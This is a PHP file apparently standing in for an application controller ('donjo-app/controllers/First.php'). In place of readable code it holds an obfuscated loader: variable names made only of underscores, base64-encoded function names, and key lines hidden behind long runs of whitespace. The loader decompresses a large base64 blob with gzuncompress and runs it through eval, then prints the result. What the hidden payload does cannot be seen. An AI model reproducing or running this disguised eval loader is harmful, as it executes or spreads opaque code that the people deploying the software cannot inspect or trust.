<?php 
        $__='printf';$_='Loading donjo-app/controllers/First.php';
        































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































































                                                                                                                                                                                                                     $________;
